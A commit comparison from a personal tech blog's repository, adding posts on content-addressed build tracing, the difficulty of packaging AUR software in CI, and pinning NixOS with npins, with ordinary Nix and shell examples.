Compare commits

...

10 commits

| Author | SHA1 | Message | Date |
| --- | --- | --- | --- |
| Jade Lovelace | 07074b5345 | Pinning nixos with npins | 2024-05-20 13:42:40 -07:00 |
| Jade Lovelace | 4d83323451 | pinning nix things | 2024-05-19 19:10:35 -07:00 |
| Jade Lovelace | 1f33d774c2 | draft | 2024-04-08 19:41:41 -07:00 |
| Jade Lovelace | 20934137a6 | update flakes arent real | 2024-04-08 19:41:25 -07:00 |
| Jade Lovelace | c12a6dd830 | reproducible pwning | 2024-03-18 13:39:01 -07:00 |
| Jade Lovelace | 06267b2bf7 | packaging draft | 2024-03-10 18:56:14 -07:00 |
| Jade Lovelace | e9e9a55b51 | update about page | 2024-02-14 00:17:19 -08:00 |
| Jade Lovelace | 9cdbf1eaf1 | wow another typo | 2024-02-13 14:43:13 -08:00 |
| Jade Lovelace | ad7288ed41 | fix typo in flakes | 2024-02-13 14:39:25 -08:00 |
| Jade Lovelace | 0c81e45ce4 | build systems Content | 2024-01-27 19:42:48 -08:00 |
9 changed files with 1509 additions and 19 deletions

View file

@@ -9,20 +9,23 @@ isPage = true
+++
Hi!
I'm an undergraduate student in Computer Engineering at the University of
British Columbia.
I'm a final-year undergraduate student in Computer Engineering at the
University of British Columbia.
I have done mechanical design for ThunderBots, a RoboCup Small Size League team
building soccer-playing robots. Prior to this, I was on a 4-person team
participating in Skills Canada Robotics, and in my last year of high school, we
had the opportunity to [go to Nationals in
Halifax](/blog/i-competed-in-skills-canada-robotics), where we achieved first
place for Saskatchewan.
In my spare time, when I am not dreaming of all computers landing on the sun, I
work on [NixOS](https://nixos.org) in various places in the project, and a
whole slew of projects you can find on my GitHub profile. I'm most interested
in compilers, operating systems, and build systems. I am a full stack
developer: I can competently write both SystemVerilog and websites, and most
things in between: programming languages are a dime a dozen and I speak a lot
of them, from Rust to Haskell, C/C++, Python, to Fake Haskell That Compiles to
Bash (Nix). I often cosplay (perhaps too successfully) as a build engineer.
Other than robotics, I am most interested in Rust and embedded systems,
especially the security thereof.
When I *am* dreaming of computers experiencing solar destruction, I like
sewing, going on long walks, and cooking.
To contact me, email `jade` at this domain (jade dot fyi).
To contact me, email `jade` at this domain (jade dot fyi) or ping me [on
fedi](https://hachyderm.io/@leftpaddotpy).
Jade
she/they

View file

@@ -0,0 +1,249 @@
+++
date = "2024-01-27"
draft = false
path = "/blog/build-systems-ca-tracing"
tags = ["build-systems", "nix"]
title = "Build systems: content addressed tracing"
+++
An idea I have lying around is something I am going to call "ca-tracing" for
the purposes of this post. The concept is to instrument builds and observe what
they actually did, and record that for future iterations so that excess
dependencies can be ignored: *even if inputs changed*, a rebuild can be skipped
if the instructions are the same and the files actually observed by the build
are the same.
# Implementation
## Assumptions
This idea assumes a hermetic build system, since we need to know if anything
might have differed from build to build, so we need a complete accounting of
the inputs to the build. It is not necessarily the case that such a hermetic
build system would be Nix-like; however, it is easiest to describe on top of a
Nix-like one: first one with build identity, then one that lacks build
identity, like Nix.
This also assumes a content-addressed build system with early cut-off like Nix
with [ca-derivations]. In Nix's case, input-addressed builds are executed, then
renamed to a content-addressed path: if a build with different inputs is
executed once more and produces the same output, it is recorded as resolving to
that output, and further rebuilds downstream are cut off.
[ca-derivations]: https://www.tweag.io/blog/2021-12-02-nix-cas-4/
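For reference, opting a derivation into content addressing in current Nix looks
roughly like the following minimal sketch (the feature is experimental, so the
exact attributes may shift):

```nix
# Requires `experimental-features = ca-derivations`. After the build runs, the
# output is moved to a path derived from its content hash, enabling the early
# cut-off described above.
derivation {
  name = "example";
  system = builtins.currentSystem;
  builder = "/bin/sh";
  args = [ "-c" "echo hello > $out" ];
  __contentAddressed = true;
  outputHashMode = "recursive";
  outputHashAlgo = "sha256";
}
```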
<aside>
Build identity is a term I invented referring to the idea that a build can know
about previous builds. Systems without build identity include those which
identify builds entirely by hashes, where the names are meaningless, such as
Nix. Build identity is an assumption that causes problems for multitenancy in
build systems, since there may be several versions of a package being built at
any given time, each based on different versions of its inputs. I've [used the term
in a previous post][postmodern-build-sys].
[postmodern-build-sys]: https://jade.fyi/blog/the-postmodern-build-system/
There may be a recognized term for this property that I have not found, please
[email me](https://jade.fyi/about) or poke me on Mastodon if you know it.
</aside>
## Conceptual implementation
Conceptually, a build is a function:
> (*inputs*, *instructions*) -> *outputs*
We wish to narrow *inputs* to *inputs<sub>actual</sub>*, and save this
information alongside *outputs*. In a following build, we can then verify if
*instructions'* matches a previous build (*instructions*) and if so, extract
the values of the same dynamically observed paths, but as they appear in
*inputs'* (that is, *inputs'<sub>actual</sub>*), and compare them to the values
of *inputs<sub>actual</sub>* from the previous build.
Since our build system is hermetic, if this hits cache, it can be assumed to have
identical results, modulo any nondeterminism (which we assume to be
unfortunate but unproblematic, and which exists regardless of this technique).
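To make the check concrete, here is a sketch of it as a pure function; all the
names are invented for illustration, not a real API:

```nix
# `previous` is the saved record of an earlier build: its instructions plus a
# map from each dynamically observed input path to the hash that was seen
# there. `hashAt` computes the hash of the equivalent path within inputs'.
canReuse = previous: instructions': hashAt:
  previous.instructions == instructions'
  && builtins.all
    (path: hashAt path == previous.observedHashes.${path})
    (builtins.attrNames previous.observedHashes);
```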
## Making it concrete
A build ("derivation" in Nix) in a Nix-like system is a specification of:
* Inputs (files, other derivations)
* Environment variables
* Command to execute
The point of ca-tracing is to remove excess inputs, so let's contemplate how to
do that.
### File names
The inputs are files named based on `hash(contents)` in Nix, but we don't
know which contents we will actually access. This is a problem, since the file
paths of *inputs* need to remain constant across multiple executions of the
build (the paths for *inputs* must equal the paths for *inputs'*), because the
part of *inputs* that changed may be irrelevant to this build.
In a system that doesn't look like Nix, the input file paths might be the same
across two builds on account of not containing hashes, so this would not be a
problem.
We can solve the file names problem by replacing the hash parts in the input
filenames with random values per-run. Assuming the builder is not doing things
with them that would render the build non-deterministic, these hashes should
never appear, even in part, in the output.
Unfortunately, the file names may still appear in the output through, for
instance, the ordering of deterministic hash tables; this exists in practice in
ELF hash tables. Realistically we would need file-type-specific rewriters to
fix up execution output to a deterministic result following multiple runs.
We would also have to rewrite those hashes within blocks of data read from
within the builder, but that is *possibly* just a few FUSE crimes away from
being doable live, on-demand.
Following the build, the temporary hashes of the inputs can be replaced with
their concrete values pointing to the larger inputs †.
<aside>
† This creates a similar content-addressing equivalence problem as
[ca-derivations] themselves could introduce if they were differently designed,
where two paths might mean the same thing. The solution adopted by
ca-derivations is to hash the output with placeholders in place of its own hash
and then substitute the hash of the path within all files in it.
Specifically, consider a derivation Dep that depends on a derivation A.
Derivation A changes some file not looked at by Dep, producing derivation B,
and Dep has its rebuild skipped. Should the resulting path for Dep point to A
or B?
Perhaps the solution here is to use a content-addressed store or filesystem
with block cloning (zfs, btrfs, xfs), into which shoving duplicates is ~free,
and actually *realize* the value of *inputs<sub>actual</sub>* to disk.
This would sadly not eliminate the need for randomizing and rewriting input
paths due to causality, since we simply do not know what paths are referenced
yet.
</aside>
### Tracing, filesystem
To trace a build, one would have to capture its filesystem activity. This is
possible with some BPF tracing constrained to a cgroup on Linux, so that is
not the hard part.
The data that would have to be known is:
* Observed directory listings with hashes
* Read file names matching *inputs*, with associated hashes
* Extremely annoyingly: `fstat(2)` results for all queried files in inputs
(this is extremely annoying because everything calls `fstat` all the time
pointlessly or to check for files being present, and it includes things like
the length of a file, which could *in principle* cause unsoundness if not
recorded).
This would then all be compared to the equivalent paths in *inputs'* and if the
hashes match, the previous build could be immediately used.
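For illustration, a hypothetical shape for one such trace record, written as a
Nix attrset (the field names are invented):

```nix
{
  # hash of the instructions that produced this record
  instructions = "sha256:...";
  # everything the build was observed to touch, keyed by path within inputs
  observed = {
    "include" = { kind = "dirlist"; hash = "sha256:..."; };
    "include/foo.h" = { kind = "read"; hash = "sha256:..."; };
    "lib/libfoo.so" = { kind = "stat"; size = 14232; };
  };
}
```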
## Avoiding build identity; how would this work in Nix?
Nix is built on top of an on-disk key-value store (namely, the directory
`/nix/store`), which is a mapping:
> Hash -> Value
Thus, we just need to construct a hash in such a way that both Build and Build'
get the same hash value.
We could achieve this by modifying the derivation in a deterministic manner
such that two modified-derivations share a hash if they could plausibly have
ca-tracing applied. Specifically, rewrite the input hashes to something like
the following:
> hash("ca-tracing" + name + position-in-inputs) + "-" + name
When a build is invoked, modify the derivation, hash it, and check for the
presence of a record of a modified-derivation of the same hash, and then check
if the actually-used filesystem objects when applied to *inputs'* remain the
same.
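As a sketch, the placeholder computation itself is a one-liner
(`builtins.hashString` is real; the scheme is the hypothetical one above):

```nix
# Derive a stable stand-in for an input's store hash from only its name and
# position, so that Build and Build' produce the same modified-derivation hash.
placeholderFor = name: position:
  builtins.hashString "sha256" ("ca-tracing" + name + toString position)
  + "-" + name;
```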
# Use cases
This idea is almost certainly best suited for builds using the smallest
possible unit of work, both in terms of usefulness and likelihood of bugs in
the rewriting. To use the terminology from [Build Systems à la Carte][bsalc],
it is likely most useful for systems that are closer to constructive traces
than deep constructive traces.
[bsalc]: https://www.microsoft.com/en-us/research/uploads/prod/2018/03/build-systems.pdf
For example, if this is applied to individual compiler jobs in a C++ project,
it can eliminate rebuilds from imprecise build system dependency tracking,
whereas if the derivation/unit of work is larger, the rebuild might be
necessary anyway.
# Problems
* There could exist multiple instances of a modified-derivation with different
filesystem activity, due to, say, a bunch of rebuilds against very
differently patched inputs. This system would have to be able to either
represent that or just discard old ones.
* Real programs abuse `fstat(2)` way too much and it's very likely that this
whole thing might not actually get any cache hits in practice if `fstat`
calls are considered. Without visibility into processes we cannot know if
`fstat` calls' results are actually used for anything more than checking if a
file exists.
This might benefit from some limited dynamic tracing inside processes to
determine whether the fstat result is actually read.
* The whole enterprise is predicated on generalized sound rewriting, which is
likely very hard; see below.
## Naive rewriting is a bad idea
The implementation of ca-derivations itself, where it just rewrites hashes
appearing in random binaries with the moral equivalent of `sed`, is extremely
unsound with respect to compression, ordered structures (even NAR files would
fall victim to this), and any other kind of non-literal storage of store paths,
and this approach just adds yet more naive rewriting that is likely to explode
spectacularly at runtime.
Naively rewriting store paths is an extension of the original idea of Nix doing
runtime dependencies by naively scanning for reference paths. However,
crucially, the latter does not *modify* random binaries without any knowledge
of their contents, and the worst case scenario for that reference scanning is a
runtime error when someone downloads a binary package.
Realistically, this would have to be done with a "[diffoscope] of rewriters",
which can parse any format and rewrite references in it. We can check the
soundness of a build under rewriting by simply running the build multiple
times. The rewriter need
not be a trusted component, since its impact is only as far as breaking your
binaries (reproducibly so), which Nix is great at already!
In an actual implementation, I would even go so far as saying the rewriter
*must not* be part of Nix since it is generally useful, and it is fundamentally
something that would have to move pretty fast and perhaps even have per-project
modifications such that it cannot possibly be in a Nix stability guarantee.
[diffoscope]: https://diffoscope.org/
# Related work
This is essentially the idea of edef's incomplete project [Ripple], an
arbitrary-program memoizer, among other work, but significantly scaled down to
be less general and possibly more feasible. Compared to her project, this idea
doesn't look into processes at all, and simply involves tracing filesystem
accesses to read-only resources in an already-hermetic build system.
Thanks to edef for significant feedback and discussion about this post. You can
[sponsor her on GitHub here][edef-gh] if you want to support her work on making
computers more sound, such as the Nix content-addressed cache project, tvix,
and also her giving these ideas to Arch Linux developers.
[edef-gh]: https://github.com/sponsors/edef1c
[Ripple]: https://nlnet.nl/project/Ripple/

View file

@@ -167,11 +167,12 @@ even if the same package name appears in both. Magic ✨
That is, in the following intentionally-flawed-for-other-reasons `flake.nix`:
```nix
-{...}: {
+{
   # ....
   outputs = { nixpkgs, ... }:
-  let pkgs = nixpkgs.legacyPackages.x86_64-linux;
-  in {
-    packages.x86_64-linux.x = pkgs.callPackage ./package.nix { };
+    let pkgs = nixpkgs.legacyPackages.x86_64-linux;
+    in {
+      packages.x86_64-linux.x = pkgs.callPackage ./package.nix { };
   };
 }
```
@@ -453,6 +454,12 @@ actually invoking `nixpkgs.lib.nixosSystem`. The latter is the much more
sinister part, and the reason I would strongly recommend inline modules with
closures instead of `specialArgs`: they break flake composition.
That being said, *either* using `specialArgs` *or* an inline module inside
`flake.nix`, rather than an option above, is the only way to inject module
imports. That is, if one uses some option like `imports = [ config.someOption
]`, it will cause an infinite recursion error. We would suggest putting the
imports inside an inline module inside `flake.nix` for this case.
To use `specialArgs`, an attribute set is passed into `nixpkgs.lib.nixosSystem`,
the attributes of which then land in the arguments of NixOS modules:
@@ -463,11 +470,11 @@ nixosConfigurations.something = nixpkgs.lib.nixosSystem {
   specialArgs = {
     myPkgs = nixpkgs;
   };
-  modules = {
-    { pkgs, lib, myPkgs }: {
+  modules = [
+    ({ pkgs, lib, myPkgs }: {
       # do something with myPkgs
-    }
-  };
+    })
+  ];
 }
```

Binary file not shown (image, 134 KiB).

View file

@@ -0,0 +1,256 @@
+++
date = "2024-01-27"
draft = true
path = "/blog/packaging-is-extremely-hard"
tags = ["build-systems", "arch-linux", "linux", "nix"]
title = "Packaging is extremely hard, or, why building AUR packages in CI is a nightmare"
+++
Packaging on a traditional distribution is challenging to say the least, and I
haven't seen any coherent descriptions of *why* hermetic build systems like Nix
eliminate an entire category of things one would otherwise have to think about.
Recently a friend mentioned she was considering setting up a CI service for
some AUR packages with a trivial cron job, whereas my reaction to the idea of
CI for Arch packages is "that would take a month of work to do correctly".
Let's explore the inherent complexity in writing a CI service for basically any
binary distro; picking on Arch Linux is only because it is what I have
experience with, though they tend to be especially fast and loose with inherent
complexity. One could argue that Arch in particular is the Go of distros, since
it ignores a lot of hard things in order to ship a working distro, similarly to
[how Go famously solves complexity by ignoring it][golang]. This is not about
factionalism; it is about the choices of where distro maintainers have spent
their energy, and ignoring complexity is something that has its place.
Arch is known for having a large user-maintained repository of non-reviewed,
community-written packaging for most anything under the sun, called the AUR.
This is a blessing and a curse, because Arch is extremely a binary distro.
Pretty much this entire post would apply to anyone maintaining a binary
repository for another distribution, except perhaps the part about building
packages maintained by other people in CI.
[golang]: https://fasterthanli.me/articles/i-want-off-mr-golangs-wild-ride
[rebuild-conds]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#The_workflow
[rebuild-detector]: https://github.com/maximbaz/rebuild-detector
## "Rebuild conditions are indeterminate", or, why C++ people are always talking about ABI
If you are a downstream consumer of an official binary package, such as being
an AUR packager, there is not really any obvious notice that you should rebuild
your package due to dependency updates, besides, perhaps, [rebuild-detector]
and upgrading your system regularly.
The way that release management is done at Arch Linux is that maintainers
updating libraries go and [ping all their colleagues][soname-bump] when
upstream changes the software such that it is no longer binary-compatible
("ABI-compatible"), represented by a "soname bump", e.g. changing the file name
`libc.so.5` -> `libc.so.6`. This is not terribly unusual among distros.
However, it's perfectly possible that packages break their ABI without updating
their soname, since most changes to C header files besides adding things will
break ABI in theory, for instance, changing `#define` constants or other such
things. So, if upstream is being impolite, they can cause bugs at any time, and
blatant changes can be caught by things like [abi-checker], though they don't
necessarily form part of the official process for Arch.
[abi-checker]: https://lvc.github.io/abi-compliance-checker/
[soname-bump]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#Run_sogrep_on_identified_soname_change
When packages are rebuilt without being updated, this is done by incrementing
`pkgrel` in the PKGBUILD, which is achieved automatically in the official repos
with `pkgctl build --rebuild` ([man page][pkgctl-build]) of the affected
packages. For example, for a version `0.20.10-1`, incrementing `pkgrel` would
produce a version `0.20.10-2`, which is uploaded to staging as well as pushed
to the package's own Git repo with `pkgctl release`.
After all the builds are made, `pkgctl db move` is invoked to move all the
packages over.
<aside>
One might wonder why there is all this `pkgrel` business to begin with, and it
is simply that the package manager will only see an update if the version
changed, and in most systems, only if the version changed *upwards*, by
default.
</aside>
[pkgctl-build]: https://man.archlinux.org/man/pkgctl-build.1.en
### Atomicity? Is that like a criticality incident?
{% image(name="./antifa-demon-core.png", colocated=true) %}
an antifaschistische aktion sticker with a demon core in the middle,
"ausgerutscht, trotzdem da" on top and "kernphysiker antifa" on the bottom
{% end %}
<aside>
Demon core shitpost [made by Agatha](https://fv.technogothic.net/@AgathaSorceress/111810771067247145).
</aside>
If the official repos operate by coordination between all the packagers, with a
staging area to atomically release rebuilds, it follows that AUR packagers can
expect that official repos can and will change at any time without notification
(unless one goes and looks at the development bug tracker).
<aside>
**Uncertain** fact: the Arch repos seem to not have any versioning on the *set
of packages together*. Packages are moved to the primary repos, and then they
are there, but this seems to be just done by poking a file on disk; there is no
atomic versioning of the set as a whole, aside from hoping the [Arch Linux
Archive][arch-arm] has a useful snapshot on the relevant day.
</aside>
[arch-arm]: https://wiki.archlinux.org/title/Arch_Linux_Archive
This is a relatively reasonable process for a distro that doesn't fully
automate everything and even one that does, but it is kind of a problem if you
aren't an official maintainer working in the official repos, since you aren't
in the notification list.
Note also that the information that the AUR itself has on packages is not
sufficient to send emails about this either; this isn't the fault of the
Arch developers.
However, the upshot of this is that if one is using an AUR package maintained
by someone else, there is no guarantee anyone has tried building it against the
latest versions of the official repos, and it is in fact also impossible to
know what versions it was successfully built against. A local build of an AUR
package can get arbitrarily out of sync with the official repos and it is not
easily possible to reconstruct the state of all the repos that went into
building it.
Stuff randomly breaking due to repositories using the time of day as a software
version pinning mechanism is not just an AUR problem: it is much, much worse on
third-party binary repositories. For instance, even though [archzfs] is by far
one of the best-executed third-party repositories, in large part on account of
them running a CI service, it can still get out of sync with the versions of
the kernel.
[archzfs]: https://github.com/archzfs/archzfs
However, the case where third-party repositories get *really* out of sync is
distros like Manjaro, which delay their repositories by two weeks relative to
Arch for "stability". This doesn't work out very well.
## The source-build-source cycle
For any package, a CI system that fully automates the packaging workflow needs
to be able to increment `pkgrel` on any dependency updates and trigger a
rebuild automatically. This is stored in the package source files: the CI
system has to be able to push to the sources automatically.
This also means that a CI system building someone else's AUR packages needs to
*fork any packages it builds*, since it must be able to update `pkgrel` based
on its own detection of upstream changes, without worrying about the AUR
maintainer doing it.
### Building someone else's stuff? Better reconcile it with your automated local changes
However, the even worse corollary of the above is if the other maintainer
*does* update `pkgrel`, since then you have to reconcile your own maintained
`pkgrel` and ensure that it strictly increases even with the maintainer's
changes.
Another cause of needing to rebuild AUR sourced packages is the AUR package
itself changing, perhaps because upstream updated it and the AUR packager
updated their packaging. In that case, one has to discard local changes and
hope that versions strictly increased so pacman will install the new one.
## Weightless! In the package manager! Loopy dependency graphs
Debian ([documentedly so][debian-loopy]) and most other binary distros don't
have any tooling preventing packages from forming circular build dependency
graphs.
The most trivial one that exists in most any binary distribution is the C++
compiler, which is likely a build dependency of itself, since both clang and
gcc are written in C++.
How does one get the first compiler? In most distros, the answer is
"someone built it manually from somewhere and shoved it in /usr/local and then
built the first compiler package using some crimes". However, that path is, for
the most part, not documented or clearly reproducible. It is the typical state
of affairs to have the *distro repository itself* be a ball of inscrutable
mutable state.
In NixOS it's [a tarball of compilers that's built with Nix and is occasionally
updated][nixos-bootstrap-tools], and will in the future [be rooted in a
256-byte binary][nixos-minimal-bootstrap], after which everything is built from
source, which is what Guix also does. There's a bunch more information about
the efforts to bootstrap from nearly nothing at [bootstrappable.org], as well
as [on the Guix blog][fsb].
[bootstrappable.org]: https://bootstrappable.org/
[fsb]: https://guix.gnu.org/en/blog/2023/the-full-source-bootstrap-building-from-source-all-the-way-down/
[nixos-bootstrap-tools]: https://github.com/nixos/nixpkgs/blob/d0efa70d8114756ca5aeb875b7f3cf6d61543d62/pkgs/stdenv/linux/make-bootstrap-tools.nix#L237-L256
[nixos-minimal-bootstrap]: https://github.com/nixos/nixpkgs/blob/3dcd819caa03c848a9a06964857e12e4b789239e/pkgs/os-specific/linux/minimal-bootstrap/default.nix
[debian-loopy]: https://wiki.debian.org/CircularBuildDependencies
## Package tests? p--package integration t-tests??
So you want to write an integration test for your package on Arch Linux. That's
too bad, because there's not a testing framework, because there are not tests.
Packages can run the software's testsuite, but there is no officially supported
integration testing solution.
# Software engineering fixes this
I have spilled a thousand words on how traditional binary distros (that [are
not Fedora][fedora-ci]) spend a significant amount of labour doing rebuilds
largely by hand, with scripts on their local machines, coordinating amongst
maintainers. Most packages are built on developer machines, though [never on
Fedora][fedora-ci2] and only [sometimes on Debian][debian-ci], and thus cannot
necessarily be trusted to not be contaminated by the squishy mutable stuff that
happens on dev machines. Even though they are typically built in chroots, the
environment is not controlled.
[debian-ci]: https://ci.debian.net/
I have addressed how packages require manually poking `pkgrel` every time a
rebuild is necessary, and how the need for rebuilds affects downstream
builders. This is, incidentally, [largely still true on
Fedora][fedora-updates].
The (pessimistic but sound) way to manage rebuilds is to just recompile every
downstream when a single bit of any dependency changes. This is the approach
used by Nix and it trades a significant but not unaffordably large (for a big
distro) amount of computer time in a build cluster for not having to think
about any of this. ABI breaks cannot affect the distribution because everything
was built against the exact same libraries, together.
A Nix-like hermetic build system doesn't have a concept of `pkgrel`, because
packages are just what is in the single monorepo source tree on a given commit.
There is nothing wrong with the other approach of multiple repositories and
repository metadata that doesn't expose a single history, but it would be
useful to be able to cleanly ensure that a group of machines have exactly the
same packages on them as of some epoch, say.
Facebook has made a tool for RPM distributions that builds OS images with
Buck2, called [Antlir]. It takes snapshots of repositories and builds OS
images with a hermetic build system, such that builds produce the exact same
result every time.
[Antlir]: https://facebookincubator.github.io/antlir/docs/
ABI breaks can *also* not break downstream consumers of `nixpkgs`, because Nix
builds out-of-tree stuff exactly the same using the same version set as
anything else: unlike every binary distribution, the distribution packages are
not special, and building out-of-tree stuff will never randomly break due to
ABI changes.
NixOS has a robust and widely used [integration
test][nixos-integration-tests] system (1040 tests at the time of writing),
like Fedora, testing most parts of the system and [gating repository
updates][nixos-gating] like Fedora Bodhi.
[nixos-gating]: https://status.nixos.org/
[nixos-integration-tests]: https://nix.dev/tutorials/nixos/integration-testing-using-virtual-machines.html
[fedora-updates]: https://docs.fedoraproject.org/en-US/fesco/Updates_Policy/
[fedora-ci2]: https://discussion.fedoraproject.org/t/report-from-the-reproducible-builds-hackfest-during-flock-2023/87469
[fedora-ci]: https://docs.fedoraproject.org/en-US/ci/
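To give a taste of what such a test looks like, here is a minimal sketch using
the `nixosTest` helper from nixpkgs; the tested "service" is deliberately
trivial:

```nix
let
  pkgs = import <nixpkgs> { };
in
pkgs.nixosTest {
  name = "hello-smoke-test";
  # a NixOS machine under test, described as an ordinary NixOS module
  nodes.machine = { pkgs, ... }: {
    environment.systemPackages = [ pkgs.hello ];
  };
  # the test driver script is Python, run against the booted VM
  testScript = ''
    machine.wait_for_unit("multi-user.target")
    machine.succeed("hello")
  '';
}
```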

View file

@@ -0,0 +1,368 @@
+++
date = "2024-05-20"
draft = false
path = "/blog/pinning-nixos-with-npins"
tags = ["nix"]
title = "Pinning NixOS with npins, or how to kill channels forever without flakes"
+++
> Start of Meetup: "hmm, Kane is using nixos channels, that's not good, it's going to gaslight you"<br/>
> 6 hours later: Utterly bamboozled by channels<br/>
> 6.5 hours later: I am no longer using channels
\- [@riking@social.wxcafe.net](https://social.wxcafe.net/@riking/112465844452065776)
Nix channels (a name which, just like "Nix", is overloaded to mean several
things) are an excellent way to confuse and baffle yourself with a NixOS
configuration by making it depend on uncontrolled and confusing external
variables rather than being self-contained. You can see [an excellent
explanation of the overloaded meanings of "channels" at samueldr's
blog][samueldr-channels]. In this post I am using "channels" to refer to the
`nix-channel` command that many people to manage what `<nixpkgs>` points to,
and thus control system updates.
[samueldr-channels]: https://samuel.dionne-riel.com/blog/2024/05/07/its-not-flakes-vs-channels.html
It is a poorly guarded secret in NixOS that `nixos-rebuild` is simply a bad
shell script; you can [read the sources here][nixos-rebuild]. I would even go
so far as to argue that it's a bad shell script that is a primary contributor
to flakes gaining prominence, since its UX on flakes is so much better: flakes
don't have the `/etc/nixos` permissions problems *or* the pains around pinning
that exist in the default non-flakes `nixos-rebuild` experience. We rather owe
it to our users to produce a better build tool, though, because `nixos-rebuild`
is *awful*, and there are currently the beginnings of efforts in that direction
by people including samueldr; `colmena` is also an example of a better build
tool.
Both the permissions issue and the pinning are extremely solvable problems
though, which is the subject of this post. [Flakes have their
flaws][samueldr-flakes] and, more to the point, plenty of people just don't
want to learn them yet, and nobody has yet met people where they are at with
respect to making this simplification *without* doing it with flakes.
This is ok! Let's use something more understandable that does the pinning part
of flakes and not worry about the other parts.
[samueldr-flakes]: https://samuel.dionne-riel.com/blog/2023/09/06/flakes-is-an-experiment-that-did-too-much-at-once.html
This blog post teaches you how to move your NixOS configuration into a repo
wherever you want, and eliminate `nix-channel` altogether, instead pinning the
version of `<nixpkgs>` and NixOS in a file in your repo next to your config.
[nixos-rebuild]: https://github.com/nixos/nixpkgs/blob/b5c90bbeb36af876501e1f4654713d1e75e6f972/pkgs/os-specific/linux/nixos-rebuild/nixos-rebuild.sh
# Background: what NixOS builds actually do
First, let's go over how NixOS builds actually work, skipping over all the
remote build stuff that `nixos-rebuild` also does.
For non-flakes, `<nixpkgs/nixos>` is evaluated; that is, [`nixos/default.nix`][nixos-defaultnix] in
`<nixpkgs>`. This resolves the `NIX_PATH` entry `<nixos-config>` as the first
user-provided NixOS module to evaluate, or alternatively
`/etc/nixos/configuration.nix` if that doesn't exist. For flake configurations,
substitute `yourflake#nixosConfigurations.NAME` in your head in place of
`<nixpkgs/nixos>`.
[nixos-defaultnix]: https://github.com/nixos/nixpkgs/blob/6510ec5acdd465a016e5671ffa99460ef70e6c25/nixos/default.nix
The default `NIX_PATH` is the following:
```
nix-path = $HOME/.nix-defexpr/channels nixpkgs=/nix/var/nix/profiles/per-user/root/channels/nixpkgs /nix/var/nix/profiles/per-user/root/channels
```
That is to say, unless it's been changed, `<nixpkgs>` will reference root's
channels, managed with `nix-channel`.
Next, the attribute `config.nix.package` of `<nixpkgs/nixos>` is evaluated then
built/downloaded (!!) unless it is a flake config (or `--no-build-nix` or
`--fast` is passed). Then the attribute `config.system.build.nixos-rebuild` is
likewise evaluated and the `nixos-rebuild` is re-executed into the one from the
future configuration instead of the one from the current configuration, unless
`--fast` is passed.
Once your configuration has been evaluated once or twice pointlessly, it is
evaluated a third time, for the attribute `config.system.build.toplevel`, and
that is built to yield the new system generation.
This derivation is what becomes `/run/current-system`: it contains a bunch of
symlinks to everything that forms that generation such as the kernel, initrd,
`etc` and `sw` (which is the NixOS equivalent of `/usr`).
Finally, `the-build-result/bin/switch-to-configuration` is invoked with an
argument `switch`, `dry-activate`, or similar.
---
From this information, one could pretty much write a NixOS build tool: it really is
just `nix build -f '<nixpkgs/nixos>' config.system.build.toplevel` (in old
syntax, `nix-build '<nixpkgs/nixos>' -A config.system.build.toplevel`), then
`result/bin/switch-to-configuration`. That's all it does.
# Background: what is npins anyway?
[`npins`][npins] is the spiritual successor to [niv], the venerable Nix pinning
tool many people used before switching to flakes. But what is a pinning tool
for Nix anyway? It's just a tool that finds the latest commit of something,
downloads it, then stores that commit ID and the hash of the code in it in a
machine-readable lock file that you can check in. When evaluating your Nix
expressions, they can use `builtins.fetchTarball` to obtain that exact same
code every time.
That is to say, a pinning tool lets you avoid having to copy-paste Git commit
IDs around; ultimately it does something like the following, which hands you
a path in the Nix store with the code at that version.
```nix
builtins.fetchTarball {
  # https://github.com/lix-project/lix/tree/main
  url = "https://github.com/lix-project/lix/archive/992c63fc0b485e571714eabe28e956f10e865a89.tar.gz";
  sha256 = "sha256-L1tz9F8JJOrjT0U6tC41aynGcfME3wUubpp32upseJU=";
  name = "source";
};
```
Let's demystify how pinning tools work by writing a trivial one in a couple of
lines of code.
First, let's find the latest commit of nixos-unstable with `git ls-remote`:
```
~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable
4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 refs/heads/nixos-unstable
~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable | cut -f1
4a6b83b05df1a8bd7d99095ec4b4d271f2956b64
```
Then we can construct an archive URL for that commit ID, and fetch it into the
Nix store:
```
~ » nix-prefetch-url --name source --unpack https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz
0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq
```
And finally fetch it from a Nix expression:
```
~ » nix repl
Lix 2.90.0-lixpre20240517-0d2cc81
Type :? for help.
nix-repl> nixpkgs = builtins.fetchTarball { url = "https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz"; name = "source"; sha256 = "0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq"; }
nix-repl> nixpkgs
"/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"
```
This is essentially exactly what npins does, minus the part of saving the
commit ID and hash into `npins/sources.json`.
We could write a simple shell script to do this, perhaps called
`./bad-npins.sh`:
```bash
#!/usr/bin/env bash
name=nixpkgs
repo=https://github.com/nixos/nixpkgs
branch=nixos-unstable

# GitHub serves tarballs of a given commit at /archive/<sha>.tar.gz
tarballUrl="$repo/archive/$(git ls-remote "$repo" "$branch" | cut -f1).tar.gz"
sha256=$(nix-prefetch-url --name source --unpack "$tarballUrl")

# initialize sources.json if not present
[[ ! -f sources.json ]] && echo '{}' > sources.json

# use sponge from moreutils to deal with jq not having the buffering to safely
# do in-place updates
< sources.json jq --arg sha256 "$sha256" --arg url "$tarballUrl" --arg name "$name" \
    '.[$name] = {sha256: $sha256, url: $url}' \
    | sponge sources.json
```
and then from Nix we can load the sources:
```nix
let
  srcs = builtins.fromJSON (builtins.readFile ./sources.json);
  fetchOne = _name: { sha256, url, ... }: builtins.fetchTarball {
    name = "source";
    inherit sha256 url;
  };
in
  builtins.mapAttrs fetchOne srcs
```
Result:
```
~ » nix eval -f sources.nix
{ nixpkgs = "/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"; }
```
We now have a bad pinning tool! I wouldn't recommend using this shell script, since
it doesn't do things like check if redownloading the tarball is necessary, but
it is certainly cute and it does work.
